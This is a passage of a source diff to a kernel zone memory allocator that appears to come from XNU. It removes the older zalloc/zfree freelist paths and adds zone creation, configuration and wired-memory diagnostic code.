-               validate_bit = ZALLOC_ELEMENT_NEEDS_VALIDATION;
+       top_wired = total = zonestotal = 0;
+       zone_foreach(z) {
+               zonestotal += zone_size_wired(z);
        }
 
-       /* Remove this element from the free list */
-       zone_page_meta_set_freelist(page_meta, page, next_element);
-
-       if (kind == ZONE_ADDR_FOREIGN) {
-               if (next_element == 0) {
-                       /* last foreign element allocated on page, move to all_used_foreign */
-                       zone_meta_requeue(zone, &zone->pages_all_used_foreign, page_meta, kind);
+       for (uint32_t idx = 0; idx < num_info; idx++) {
+               info = &memory_info[idx];
+               if (!info->size) {
+                       continue;
+               }
+               if (VM_KERN_COUNT_WIRED == info->site) {
+                       top_wired = info->size;
+               }
+               if (VM_KERN_SITE_HIDE & info->flags) {
+                       continue;
+               }
+               if (!(VM_KERN_SITE_WIRED & info->flags)) {
+                       continue;
                }
-       } else if (next_element == 0) {
-               zone_meta_requeue(zone, &zone->pages_all_used, page_meta, kind);
-       } else if (page_meta->zm_alloc_count == 0) {
-               /* remove from free, move to intermediate */
-               zone_meta_requeue(zone, &zone->pages_intermediate, page_meta, kind);
+               total += info->size;
        }
+       total += zonestotal;
 
-       if (os_add_overflow(page_meta->zm_alloc_count, 1,
-           &page_meta->zm_alloc_count)) {
-               /*
-                * This will not catch a lot of errors, the proper check
-                * would be against the number of elements this run should
-                * have which is expensive to count.
-                *
-                * But zm_alloc_count is a 16 bit number which could
-                * theoretically be valuable to cause to wrap around,
-                * so catch this.
-                */
-               zone_page_meta_accounting_panic(zone, page_meta,
-                   "zm_alloc_count overflow");
-       }
-       if (os_sub_overflow(zone->countfree, 1, &zone->countfree)) {
-               zone_accounting_panic(zone, "countfree wrap-around");
-       }
+       printf("vm_page_diagnose_check %qd of %qd, zones %qd, short 0x%qx\n",
+           total, top_wired, zonestotal, top_wired - total);
 
-#if VM_MAX_TAG_ZONES
-       if (__improbable(zone->tags)) {
-               vm_tag_t tag = zalloc_flags_get_tag(flags);
-               // set the tag with b0 clear so the block remains inuse
-               ZTAG(zone, element)[0] = (vm_tag_t)(tag << 1);
-               vm_tag_update_zone_size(tag, zone->tag_zone_index,
-                   zone_elem_size(zone), waste);
-       }
-#endif /* VM_MAX_TAG_ZONES */
-#if KASAN_ZALLOC
-       if (zone->percpu) {
-               zpercpu_foreach_cpu(i) {
-                       kasan_poison_range(element + ptoa(i),
-                           zone_elem_size(zone), ASAN_VALID);
-               }
-       } else {
-               kasan_poison_range(element, zone_elem_size(zone), ASAN_VALID);
-       }
-#endif
+       kmem_free(kernel_map, memory_info_addr, memory_info_vmsize);
 
-       return element | validate_bit;
+       return kr;
 }
 
-/*
- *     zalloc returns an element from the specified zone.
- *
- *     The function is noinline when zlog can be used so that the backtracing can
- *     reliably skip the zalloc_ext() and zalloc_log_or_trace_leaks()
- *     boring frames.
- */
-#if ZONE_ENABLE_LOGGING
-__attribute__((noinline))
-#endif
-void *
-zalloc_ext(
-       zone_t          zone,
-       zone_stats_t    zstats,
-       zalloc_flags_t  flags,
-       vm_size_t       waste)
-{
-       vm_offset_t     addr = 0;
-       vm_size_t       elem_size = zone_elem_size(zone);
-
-       /*
-        * KASan uses zalloc() for fakestack, which can be called anywhere.
-        * However, we make sure these calls can never block.
-        */
-       assert(zone->kasan_fakestacks ||
-           ml_get_interrupts_enabled() ||
-           ml_is_quiescing() ||
-           debug_mode_active() ||
-           startup_phase < STARTUP_SUB_EARLY_BOOT);
+extern boolean_t(*volatile consider_buffer_cache_collect)(int);
 
-       /*
-        * Make sure Z_NOFAIL was not obviously misused
-        */
-       if ((flags & Z_NOFAIL) && !zone->prio_refill_count) {
-               assert(!zone->exhaustible && (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0);
-       }
+#endif /* DEBUG || DEVELOPMENT */
 
-#if CONFIG_ZCACHE
-       /*
-        * Note: if zone caching is on, gzalloc and tags aren't used
-        *       so we can always check this first
-        */
-       if (zone_caching_enabled(zone)) {
-               addr = zcache_alloc_from_cpu_cache(zone, zstats, waste);
-               if (__probable(addr)) {
-                       goto allocated_from_cache;
-               }
+kern_return_t
+mach_zone_force_gc(
+       host_t host)
+{
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
        }
-#endif /* CONFIG_ZCACHE */
 
-#if CONFIG_GZALLOC
-       if (__improbable(zone->gzalloc_tracked)) {
-               addr = gzalloc_alloc(zone, zstats, flags);
-               goto allocated_from_gzalloc;
-       }
-#endif /* CONFIG_GZALLOC */
-#if VM_MAX_TAG_ZONES
-       if (__improbable(zone->tags)) {
-               vm_tag_t tag = zalloc_flags_get_tag(flags);
-               if (tag == VM_KERN_MEMORY_NONE) {
-                       /*
-                        * zone views into heaps can lead to a site-less call
-                        * and we fallback to KALLOC as a tag for those.
-                        */
-                       tag = VM_KERN_MEMORY_KALLOC;
-                       flags |= Z_VM_TAG(tag);
-               }
-               vm_tag_will_update_zone(tag, zone->tag_zone_index);
+#if DEBUG || DEVELOPMENT
+       /* Callout to buffer cache GC to drop elements in the apfs zones */
+       if (consider_buffer_cache_collect != NULL) {
+               (void)(*consider_buffer_cache_collect)(0);
        }
-#endif /* VM_MAX_TAG_ZONES */
-
-       lock_zone(zone);
-       assert(zone->z_self == zone);
+       zone_gc(ZONE_GC_DRAIN);
+#endif /* DEBUG || DEVELOPMENT */
+       return KERN_SUCCESS;
+}
 
-       /*
-        * Check if we need another thread to replenish the zone or
-        * if we have to wait for a replenish thread to finish.
-        * This is used for elements, like vm_map_entry, which are
-        * needed themselves to implement zalloc().
-        */
-       if (__improbable(zone->prio_refill_count &&
-           zone->countfree <= zone->prio_refill_count / 2)) {
-               zone_refill_asynchronously_locked(zone);
-       } else if (__improbable(zone->countfree == 0)) {
-               zone_refill_synchronously_locked(zone, flags);
-               if (__improbable(zone->countfree == 0)) {
-                       unlock_zone(zone);
-                       if (__improbable(flags & Z_NOFAIL)) {
-                               zone_nofail_panic(zone);
-                       }
-                       goto out_nomem;
-               }
-       }
+zone_t
+zone_find_largest(void)
+{
+       uint32_t    largest_idx  = 0;
+       vm_offset_t largest_size = zone_size_wired(&zone_array[0]);
 
-       addr = zalloc_direct_locked(zone, flags, waste);
-       if (__probable(zstats != NULL)) {
-               /*
-                * The few vm zones used before zone_init() runs do not have
-                * per-cpu stats yet
-                */
-               int cpu = cpu_number();
-               zpercpu_get_cpu(zstats, cpu)->zs_mem_allocated += elem_size;
-#if ZALLOC_DETAILED_STATS
-               if (waste) {
-                       zpercpu_get_cpu(zstats, cpu)->zs_mem_wasted += waste;
+       zone_index_foreach(i) {
+               vm_offset_t size = zone_size_wired(&zone_array[i]);
+               if (size > largest_size) {
+                       largest_idx = i;
+                       largest_size = size;
                }
-#endif /* ZALLOC_DETAILED_STATS */
        }
 
-       unlock_zone(zone);
-
-#if ZALLOC_ENABLE_POISONING
-       bool validate = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION;
-#endif
-       addr &= ~ZALLOC_ELEMENT_NEEDS_VALIDATION;
-       zone_clear_freelist_pointers(zone, addr);
-#if ZALLOC_ENABLE_POISONING
-       /*
-        * Note: percpu zones do not respect ZONE_MIN_ELEM_SIZE,
-        *       so we will check the first word even if we just
-        *       cleared it.
-        */
-       zalloc_validate_element(zone, addr, elem_size - sizeof(vm_offset_t),
-           validate);
-#endif /* ZALLOC_ENABLE_POISONING */
+       return &zone_array[largest_idx];
+}
 
-allocated_from_cache:
-#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS
-       if (__improbable(zalloc_should_log_or_trace_leaks(zone, elem_size))) {
-               zalloc_log_or_trace_leaks(zone, addr);
-       }
-#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */
+#endif /* !ZALLOC_TEST */
+#pragma mark zone creation, configuration, destruction
+#if !ZALLOC_TEST
 
-#if CONFIG_GZALLOC
-allocated_from_gzalloc:
-#endif
-#if KASAN_ZALLOC
-       if (zone->kasan_redzone) {
-               addr = kasan_alloc(addr, elem_size,
-                   elem_size - 2 * zone->kasan_redzone, zone->kasan_redzone);
-               elem_size -= 2 * zone->kasan_redzone;
-       }
-       /*
-        * Initialize buffer with unique pattern only if memory
-        * wasn't expected to be zeroed.
-        */
-       if (!zone->zfree_clear_mem && !(flags & Z_ZERO)) {
-               kasan_leak_init(addr, elem_size);
-       }
-#endif /* KASAN_ZALLOC */
-       if ((flags & Z_ZERO) && !zone->zfree_clear_mem) {
-               bzero((void *)addr, elem_size);
-       }
+static zone_t
+zone_init_defaults(zone_id_t zid)
+{
+       zone_t z = &zone_array[zid];
 
-       TRACE_MACHLEAKS(ZALLOC_CODE, ZALLOC_CODE_2, elem_size, addr);
+       z->z_wired_max = ~0u;
+       z->collectable = true;
+       z->expandable = true;
+       z->z_submap_idx = Z_SUBMAP_IDX_GENERAL;
 
-out_nomem:
-       DTRACE_VM2(zalloc, zone_t, zone, void*, addr);
-       return (void *)addr;
+       lck_spin_init(&z->z_lock, &zone_locks_grp, LCK_ATTR_NULL);
+       STAILQ_INIT(&z->z_recirc);
+       return z;
 }
 
-void *
-zalloc(union zone_or_view zov)
+static bool
+zone_is_initializing(zone_t z)
 {
-       return zalloc_flags(zov, Z_WAITOK);
+       return !z->z_self && !z->z_destroyed;
 }
 
-void *
-zalloc_noblock(union zone_or_view zov)
+void
+zone_set_submap_idx(zone_t zone, unsigned int sub_map_idx)
 {
-       return zalloc_flags(zov, Z_NOWAIT);
+       if (!zone_is_initializing(zone)) {
+               panic("%s: called after zone_create()", __func__);
+       }
+       if (sub_map_idx > zone_last_submap_idx) {
+               panic("zone_set_submap_idx(%d) > %d", sub_map_idx, zone_last_submap_idx);
+       }
+       zone->z_submap_idx = sub_map_idx;
 }
 
-void *
-zalloc_flags(union zone_or_view zov, zalloc_flags_t flags)
+void
+zone_set_noexpand(zone_t zone, vm_size_t nelems)
 {
-       zone_t zone = zov.zov_view->zv_zone;
-       zone_stats_t zstats = zov.zov_view->zv_stats;
-       assert(!zone->percpu);
-       return zalloc_ext(zone, zstats, flags, 0);
+       if (!zone_is_initializing(zone)) {
+               panic("%s: called after zone_create()", __func__);
+       }
+       zone->expandable = false;
+       zone->z_wired_max = zone_alloc_pages_for_nelems(zone, nelems);
 }
 
-void *
-zalloc_percpu(union zone_or_view zov, zalloc_flags_t flags)
+void
+zone_set_exhaustible(zone_t zone, vm_size_t nelems)
 {
-       zone_t zone = zov.zov_view->zv_zone;
-       zone_stats_t zstats = zov.zov_view->zv_stats;
-       assert(zone->percpu);
-       return (void *)__zpcpu_mangle(zalloc_ext(zone, zstats, flags, 0));
+       if (!zone_is_initializing(zone)) {
+               panic("%s: called after zone_create()", __func__);
+       }
+       zone->expandable = false;
+       zone->exhaustible = true;
+       zone->z_wired_max = zone_alloc_pages_for_nelems(zone, nelems);
 }
 
-static void *
-_zalloc_permanent(zone_t zone, vm_size_t size, vm_offset_t mask)
+/**
+ * @function zone_create_find
+ *
+ * @abstract
+ * Finds an unused zone for the given name and element size.
+ *
+ * @param name          the zone name
+ * @param size          the element size (including redzones, ...)
+ * @param flags         the flags passed to @c zone_create*
+ * @param zid_inout     the desired zone ID or ZONE_ID_ANY
+ *
+ * @returns             a zone to initialize further.
+ */
+static zone_t
+zone_create_find(
+       const char             *name,
+       vm_size_t               size,
+       zone_create_flags_t     flags,
+       zone_id_t              *zid_inout)
 {
-       const zone_addr_kind_t kind = ZONE_ADDR_NATIVE;
-       struct zone_page_metadata *page_meta;
-       vm_offset_t offs, addr;
-       zone_pva_t pva;
+       zone_id_t nzones, zid = *zid_inout;
+       zone_t z;
 
-       assert(ml_get_interrupts_enabled() ||
-           ml_is_quiescing() ||
-           debug_mode_active() ||
-           startup_phase < STARTUP_SUB_EARLY_BOOT);
+       simple_lock(&all_zones_lock, &zone_locks_grp);
 
-       size = (size + mask) & ~mask;
-       assert(size <= PAGE_SIZE);
+       nzones = (zone_id_t)os_atomic_load(&num_zones, relaxed);
+       assert(num_zones_in_use <= nzones && nzones < MAX_ZONES);
 
-       lock_zone(zone);
-       assert(zone->z_self == zone);
+       if (__improbable(nzones < ZONE_ID__FIRST_DYNAMIC)) {
+               /*
+                * The first time around, make sure the reserved zone IDs
+                * have an initialized lock as zone_index_foreach() will
+                * enumerate them.
+                */
+               while (nzones < ZONE_ID__FIRST_DYNAMIC) {
+                       zone_init_defaults(nzones++);
+               }
+
+               os_atomic_store(&num_zones, nzones, release);
+       }
+
+       if (zid != ZONE_ID_ANY) {
+               if (zid >= ZONE_ID__FIRST_DYNAMIC) {
+                       panic("zone_create: invalid desired zone ID %d for %s",
+                           zid, name);
+               }
+               if (flags & ZC_DESTRUCTIBLE) {
+                       panic("zone_create: ID %d (%s) must be permanent", zid, name);
+               }
+               if (zone_array[zid].z_self) {
+                       panic("zone_create: creating zone ID %d (%s) twice", zid, name);
+               }
+               z = &zone_array[zid];
+       } else {
+               if (flags & ZC_DESTRUCTIBLE) {
+                       /*
+                        * If possible, find a previously zdestroy'ed zone in the
+                        * zone_array that we can reuse.
+                        */
+                       for (int i = bitmap_first(zone_destroyed_bitmap, MAX_ZONES);
+                           i >= 0; i = bitmap_next(zone_destroyed_bitmap, i)) {
+                               z = &zone_array[i];
 
-       for (;;) {
-               pva = zone->pages_intermediate;
-               while (!zone_pva_is_null(pva)) {
-                       page_meta = zone_pva_to_meta(pva, kind);
-                       if (page_meta->zm_freelist_offs + size <= PAGE_SIZE) {
-                               goto found;
+                               /*
+                                * If the zone name and the element size are the
+                                * same, we can just reuse the old zone struct.
+                                */
+                               if (strcmp(z->z_name, name) || zone_elem_size(z) != size) {
+                                       continue;
+                               }
+                               bitmap_clear(zone_destroyed_bitmap, i);
+                               z->z_destroyed = false;
+                               z->z_self = z;
+                               zid = (zone_id_t)i;
+                               goto out;
                        }
-                       pva = page_meta->zm_page_next;
                }
 
-               zone_refill_synchronously_locked(zone, Z_WAITOK);
-       }
-
-found:
-       offs = (page_meta->zm_freelist_offs + mask) & ~mask;
-       page_meta->zm_freelist_offs = offs + size;
-       page_meta->zm_alloc_count += size;
-       zone->countfree -= size;
-       if (__probable(zone->z_stats)) {
-               zpercpu_get(zone->z_stats)->zs_mem_allocated += size;
-       }
+               zid = nzones++;
+               z = zone_init_defaults(zid);
 
-       if (page_meta->zm_alloc_count >= PAGE_SIZE - sizeof(vm_offset_t)) {
-               zone_meta_requeue(zone, &zone->pages_all_used, page_meta, kind);
+               /*
+                * The release barrier pairs with the acquire in
+                * zone_index_foreach() and makes sure that enumeration loops
+                * always see an initialized zone lock.
+                */
+               os_atomic_store(&num_zones, nzones, release);
        }
 
-       unlock_zone(zone);
-
-       addr = offs + zone_pva_to_addr(pva);
+out:
+       num_zones_in_use++;
+       simple_unlock(&all_zones_lock);
 
-       DTRACE_VM2(zalloc, zone_t, zone, void*, addr);
-       return (void *)addr;
+       *zid_inout = zid;
+       return z;
 }
 
-static void *
-_zalloc_permanent_large(size_t size, vm_offset_t mask)
+__abortlike
+static void
+zone_create_panic(const char *name, const char *f1, const char *f2)
 {
-       kern_return_t kr;
-       vm_offset_t addr;
-
-       kr = kernel_memory_allocate(kernel_map, &addr, size, mask,
-           KMA_KOBJECT | KMA_PERMANENT | KMA_ZERO,
-           VM_KERN_MEMORY_KALLOC);
-       if (kr != 0) {
-               panic("zalloc_permanent: unable to allocate %zd bytes (%d)",
-                   size, kr);
-       }
-       return (void *)addr;
+       panic("zone_create: creating zone %s: flag %s and %s are incompatible",
+           name, f1, f2);
 }
+#define zone_create_assert_not_both(name, flags, current_flag, forbidden_flag) \
+       if ((flags) & forbidden_flag) { \
+               zone_create_panic(name, #current_flag, #forbidden_flag); \
+       }
 
-void *
-zalloc_permanent(vm_size_t size, vm_offset_t mask)
+/*
+ * Adjusts the size of the element based on minimum size, alignment
+ * and kasan redzones
+ */
+static vm_size_t
+zone_elem_adjust_size(
+       const char             *name __unused,
+       vm_size_t               elem_size,
+       zone_create_flags_t     flags __unused,
+       uint32_t               *redzone __unused)
 {
-       if (size <= PAGE_SIZE) {
-               zone_t zone = &zone_array[ZONE_ID_PERMANENT];
-               return _zalloc_permanent(zone, size, mask);
+       vm_size_t size;
+       /*
+        * Adjust element size for minimum size and pointer alignment
+        */
+       size = (elem_size + sizeof(vm_offset_t) - 1) & -sizeof(vm_offset_t);
+       if (size < ZONE_MIN_ELEM_SIZE) {
+               size = ZONE_MIN_ELEM_SIZE;
        }
-       return _zalloc_permanent_large(size, mask);
-}
 
-void *
-zalloc_percpu_permanent(vm_size_t size, vm_offset_t mask)
-{
-       zone_t zone = &zone_array[ZONE_ID_PERCPU_PERMANENT];
-       return (void *)__zpcpu_mangle(_zalloc_permanent(zone, size, mask));
+#if KASAN_ZALLOC
+       /*
+        * Expand the zone allocation size to include the redzones.
+        *
+        * For page-multiple zones add a full guard page because they
+        * likely require alignment.
+        */
+       uint32_t redzone_tmp;
+       if (flags & (ZC_KASAN_NOREDZONE | ZC_PERCPU)) {
+               redzone_tmp = 0;
+       } else if ((size & PAGE_MASK) == 0) {
+               if (size != PAGE_SIZE && (flags & ZC_ALIGNMENT_REQUIRED)) {
+                       panic("zone_create: zone %s can't provide more than PAGE_SIZE"
+                           "alignment", name);
+               }
+               redzone_tmp = PAGE_SIZE;
+       } else if (flags & ZC_ALIGNMENT_REQUIRED) {
+               redzone_tmp = 0;
+       } else {
+               redzone_tmp = KASAN_GUARD_SIZE;
+       }
+       size += redzone_tmp * 2;
+       if (redzone) {
+               *redzone = redzone_tmp;
+       }
+#endif
+       return size;
 }
 
-void
-zalloc_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1)
+/*
+ * Returns the allocation chunk size that has least framentation
+ */
+static vm_size_t
+zone_get_min_alloc_granule(
+       vm_size_t               elem_size,
+       zone_create_flags_t     flags)
 {
-       zone_index_foreach(i) {
-               zone_t z = &zone_array[i];
-
-               if (z->no_callout) {
-                       /* async_pending will never be set */
-                       continue;
+       vm_size_t alloc_granule = PAGE_SIZE;
+       if (flags & ZC_PERCPU) {
+               alloc_granule = PAGE_SIZE * zpercpu_count();
+               if (PAGE_SIZE % elem_size > 256) {
+                       panic("zone_create: per-cpu zone has too much fragmentation");
                }
-
-               lock_zone(z);
-               if (z->z_self && z->async_pending) {
-                       z->async_pending = false;
-                       zone_refill_synchronously_locked(z, Z_WAITOK);
+       } else if ((elem_size & PAGE_MASK) == 0) {
+               /* zero fragmentation by definition */
+               alloc_granule = elem_size;
+       } else if (alloc_granule % elem_size == 0) {
+               /* zero fragmentation by definition */
+       } else {
+               vm_size_t frag = (alloc_granule % elem_size) * 100 / alloc_granule;
+               vm_size_t alloc_tmp = PAGE_SIZE;
+               while ((alloc_tmp += PAGE_SIZE) <= ZONE_MAX_ALLOC_SIZE) {
+                       vm_size_t frag_tmp = (alloc_tmp % elem_size) * 100 / alloc_tmp;
+                       if (frag_tmp < frag) {
+                               frag = frag_tmp;
+                               alloc_granule = alloc_tmp;
+                       }
                }
-               unlock_zone(z);
        }
+       return alloc_granule;
 }
 
-/*
- * Adds the element to the head of the zone's free list
- * Keeps a backup next-pointer at the end of the element
- */
-void
-zfree_direct_locked(zone_t zone, vm_offset_t element, bool poison)
+vm_size_t
+zone_get_foreign_alloc_size(
+       const char             *name __unused,
+       vm_size_t               elem_size,
+       zone_create_flags_t     flags,
+       uint16_t                min_pages)
 {
-       struct zone_page_metadata *page_meta;
-       vm_offset_t page, old_head;
-       zone_addr_kind_t kind;
-       vm_size_t elem_size = zone_elem_size(zone);
-
-       vm_offset_t *primary  = (vm_offset_t *) element;
-       vm_offset_t *backup   = get_backup_ptr(elem_size, primary);
+       vm_size_t adjusted_size = zone_elem_adjust_size(name, elem_size, flags,
+           NULL);
+       vm_size_t alloc_granule = zone_get_min_alloc_granule(adjusted_size,
+           flags);
+       vm_size_t min_size = min_pages * PAGE_SIZE;
+       /*
+        * Round up min_size to a multiple of alloc_granule
+        */
+       return ((min_size + alloc_granule - 1) / alloc_granule)
+              * alloc_granule;
+}
 
-       page_meta = zone_allocated_element_resolve(zone, element, &page, &kind);
-       old_head = zone_page_meta_get_freelist(zone, page_meta, page);
+zone_t
+zone_create_ext(
+       const char             *name,
+       vm_size_t               size,
+       zone_create_flags_t     flags,
+       zone_id_t               zid,
+       void                  (^extra_setup)(zone_t))
+{
+       vm_size_t alloc;
+       uint32_t redzone;
+       zone_t z;
 
-       if (__improbable(old_head == element)) {
-               panic("zfree: double free of %p to zone %s%s\n",
-                   (void *) element, zone_heap_name(zone), zone->z_name);
+       if (size > ZONE_MAX_ALLOC_SIZE) {
+               panic("zone_create: element size too large: %zd", (size_t)size);
        }
 
-#if ZALLOC_ENABLE_POISONING
-       if (poison && elem_size < ZONE_MIN_ELEM_SIZE) {
-               assert(zone->percpu);
-               poison = false;
+       if (size < 2 * sizeof(vm_size_t)) {
+               /* Elements are too small for kasan. */
+               flags |= ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE;
        }
-#else
-       poison = false;
-#endif
 
+       size = zone_elem_adjust_size(name, size, flags, &redzone);
        /*
-        * Always write a redundant next pointer
-        * So that it is more difficult to forge, xor it with a random cookie
-        * A poisoned element is indicated by using zp_poisoned_cookie
-        * instead of zp_nopoison_cookie
+        * Allocate the zone slot, return early if we found an older match.
         */
-
-       *backup = old_head ^ (poison ? zp_poisoned_cookie : zp_nopoison_cookie);
+       z = zone_create_find(name, size, flags, &zid);
+       if (__improbable(z->z_self)) {
+               /* We found a zone to reuse */
+               return z;
+       }
 
        /*
-        * Insert this element at the head of the free list. We also xor the
-        * primary pointer with the zp_nopoison_cookie to make sure a free
-        * element does not provide the location of the next free element directly.
+        * Initialize the zone properly.
         */
-       *primary = old_head ^ zp_nopoison_cookie;
 
-#if VM_MAX_TAG_ZONES
-       if (__improbable(zone->tags)) {
-               vm_tag_t tag = (ZTAG(zone, element)[0] >> 1);
-               // set the tag with b0 clear so the block remains inuse
-               ZTAG(zone, element)[0] = 0xFFFE;
-               vm_tag_update_zone_size(tag, zone->tag_zone_index,
-                   -((int64_t)elem_size), 0);
+       /*
+        * If the kernel is post lockdown, copy the zone name passed in.
+        * Else simply maintain a pointer to the name string as it can only
+        * be a core XNU zone (no unloadable kext exists before lockdown).
+        */
+       if (startup_phase >= STARTUP_SUB_LOCKDOWN) {
+               size_t nsz = MIN(strlen(name) + 1, MACH_ZONE_NAME_MAX_LEN);
+               char *buf = zalloc_permanent(nsz, ZALIGN_NONE);
+               strlcpy(buf, name, nsz);
+               z->z_name = buf;
+       } else {
+               z->z_name = name;
        }
-#endif /* VM_MAX_TAG_ZONES */
-
-       zone_page_meta_set_freelist(page_meta, page, element);
-       if (os_sub_overflow(page_meta->zm_alloc_count, 1,
-           &page_meta->zm_alloc_count)) {
-               zone_page_meta_accounting_panic(zone, page_meta,
-                   "alloc_count wrap-around");
+       if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) {
+               z->z_stats = zalloc_percpu_permanent_type(struct zone_stats);
+       } else {
+               /*
+                * zone_init() hasn't run yet, use the storage provided by
+                * zone_stats_startup(), and zone_init() will replace it
+                * with the final value once the PERCPU zone exists.
+                */
+               z->z_stats = __zpcpu_mangle_for_boot(&zone_stats_startup[zone_index(z)]);
        }
-       zone->countfree++;
 
-       if (kind == ZONE_ADDR_FOREIGN) {
-               if (old_head == 0) {
-                       /* first foreign element freed on page, move from all_used_foreign */
-                       zone_meta_requeue(zone, &zone->pages_any_free_foreign, page_meta, kind);
-               }
-       } else if (page_meta->zm_alloc_count == 0) {
-               /* whether the page was on the intermediate or all_used, queue, move it to free */
-               zone_meta_requeue(zone, &zone->pages_all_free, page_meta, kind);
-               zone->allfree_page_count += page_meta->zm_page_count;
-       } else if (old_head == 0) {
-               /* first free element on page, move from all_used */
-               zone_meta_requeue(zone, &zone->pages_intermediate, page_meta, kind);
+       alloc = zone_get_min_alloc_granule(size, flags);
+
+       if (flags & ZC_KALLOC_HEAP) {
+               size_t rem = (alloc % size) / (alloc / size);
+
+               /*
+                * Try to grow the elements size and spread them more if the remaining
+                * space is large enough.
+                */
+               size += rem & ~(KALLOC_MINALIGN - 1);
        }
 
-#if KASAN_ZALLOC
-       if (zone->percpu) {
-               zpercpu_foreach_cpu(i) {
-                       kasan_poison_range(element + ptoa(i), elem_size,
-                           ASAN_HEAP_FREED);
-               }
+       z->z_elem_size = (uint16_t)size;
+       z->z_chunk_pages = (uint16_t)atop(alloc);
+       if (flags & ZC_PERCPU) {
+               z->z_chunk_elems = (uint16_t)(PAGE_SIZE / z->z_elem_size);
        } else {
-               kasan_poison_range(element, elem_size, ASAN_HEAP_FREED);
+               z->z_chunk_elems = (uint16_t)(alloc / z->z_elem_size);
+       }
+       if (zone_element_idx(zone_element_encode(0,
+           z->z_chunk_elems - 1, ZPM_AUTO)) != z->z_chunk_elems - 1) {
+               panic("zone_element_encode doesn't work for zone [%s]", name);
        }
-#endif
-}
-
-/*
- *     The function is noinline when zlog can be used so that the backtracing can
- *     reliably skip the zfree_ext() and zfree_log_trace()
- *     boring frames.
- */
-#if ZONE_ENABLE_LOGGING
-__attribute__((noinline))
-#endif
-void
-zfree_ext(zone_t zone, zone_stats_t zstats, void *addr)
-{
-       vm_offset_t     elem = (vm_offset_t)addr;
-       vm_size_t       elem_size = zone_elem_size(zone);
-       bool            poison = false;
-
-       DTRACE_VM2(zfree, zone_t, zone, void*, addr);
-       TRACE_MACHLEAKS(ZFREE_CODE, ZFREE_CODE_2, elem_size, elem);
 
 #if KASAN_ZALLOC
-       if (kasan_quarantine_freed_element(&zone, &addr)) {
-               return;
+       z->z_kasan_redzone = redzone;
+       if (strncmp(name, "fakestack.", sizeof("fakestack.") - 1) == 0) {
+               z->kasan_fakestacks = true;
        }
+#endif
+
        /*
-        * kasan_quarantine_freed_element() might return a different
-        * {zone, addr} than the one being freed for kalloc heaps.
-        *
-        * Make sure we reload everything.
+        * Handle KPI flags
         */
-       elem = (vm_offset_t)addr;
-       elem_size = zone_elem_size(zone);
+#if __LP64__
+       if (flags & ZC_SEQUESTER) {
+               z->z_va_sequester = true;
+       }
 #endif
+       /* ZC_CACHING applied after all configuration is done */
+       if (flags & ZC_NOCACHING) {
+               z->z_nocaching = true;
+       }
+
+       if (flags & ZC_PERCPU) {
+               /*
+                * ZC_ZFREE_CLEARMEM is forced because per-cpu zones allow for
+                * pointer-sized allocations which poisoning doesn't support.
+                */
+               zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_ALLOW_FOREIGN);
+               z->z_percpu = true;
+               z->gzalloc_exempt = true;
+               z->z_free_zeroes = true;
+       }
+       if (flags & ZC_ZFREE_CLEARMEM) {
+               z->z_free_zeroes = true;
+       }
+       if (flags & ZC_NOGC) {
+               z->collectable = false;
+       }
+       if (flags & ZC_NOENCRYPT) {
+               z->z_noencrypt = true;
+       }
+       if (flags & ZC_ALIGNMENT_REQUIRED) {
+               z->alignment_required = true;
+       }
+       if (flags & ZC_NOGZALLOC) {
+               z->gzalloc_exempt = true;
+       }
+       if (flags & ZC_NOCALLOUT) {
+               z->no_callout = true;
+       }
+       if (flags & ZC_DESTRUCTIBLE) {
+               zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_ALLOW_FOREIGN);
+               z->z_destructible = true;
+       }
 
-#if CONFIG_ZLEAKS
        /*
-        * Zone leak detection: un-track the allocation
+        * Handle Internal flags
         */
-       if (__improbable(zone->zleak_on)) {
-               zleak_free(elem, elem_size);
+       if (flags & ZC_ALLOW_FOREIGN) {
+               z->z_allows_foreign = true;
        }
-#endif /* CONFIG_ZLEAKS */
+       if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) &&
+           (flags & ZC_DATA_BUFFERS)) {
+               z->z_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES;
+       }
+       if (flags & ZC_KASAN_NOQUARANTINE) {
+               z->kasan_noquarantine = true;
+       }
+       /* ZC_KASAN_NOREDZONE already handled */
 
-#if CONFIG_ZCACHE
        /*
-        * Note: if zone caching is on, gzalloc and tags aren't used
-        *       so we can always check this first
+        * Then if there's extra tuning, do it
         */
-       if (zone_caching_enabled(zone)) {
-               return zcache_free_to_cpu_cache(zone, zstats, (vm_offset_t)addr);
+       if (extra_setup) {
+               extra_setup(z);
        }
-#endif /* CONFIG_ZCACHE */
 
+       /*
+        * Configure debugging features
+        */
 #if CONFIG_GZALLOC
-       if (__improbable(zone->gzalloc_tracked)) {
-               return gzalloc_free(zone, zstats, addr);
+       gzalloc_zone_init(z); /* might set z->gzalloc_tracked */
+       if (z->gzalloc_tracked) {
+               z->z_nocaching = true;
        }
-#endif /* CONFIG_GZALLOC */
-
+#endif
 #if ZONE_ENABLE_LOGGING
-       if (__improbable(DO_LOGGING(zone))) {
-               zfree_log_trace(zone, elem);
+       if (!z->gzalloc_tracked && num_zones_logged < max_num_zones_to_log) {
+               /*
+                * Check for and set up zone leak detection if requested via boot-args.
+                * might set z->zone_logging
+                */
+               zone_setup_logging(z);
        }
 #endif /* ZONE_ENABLE_LOGGING */
-
-       if (zone->zfree_clear_mem) {
-               poison = zfree_clear(zone, elem, elem_size);
+#if VM_MAX_TAG_ZONES
+       if (!z->gzalloc_tracked && z->kalloc_heap && zone_tagging_on) {
+               static int tag_zone_index;
+               vm_offset_t esize = zone_elem_size(z);
+               z->tags = true;
+               z->tags_inline = (((page_size + esize - 1) / esize) <=
+                   (sizeof(uint32_t) / sizeof(uint16_t)));
+               z->tag_zone_index = os_atomic_inc_orig(&tag_zone_index, relaxed);
+               assert(z->tag_zone_index < VM_MAX_TAG_ZONES);
        }
+#endif
 
-       lock_zone(zone);
-       assert(zone->z_self == zone);
-
-       if (!poison) {
-               poison = zfree_poison_element(zone, &zone->zp_count, elem);
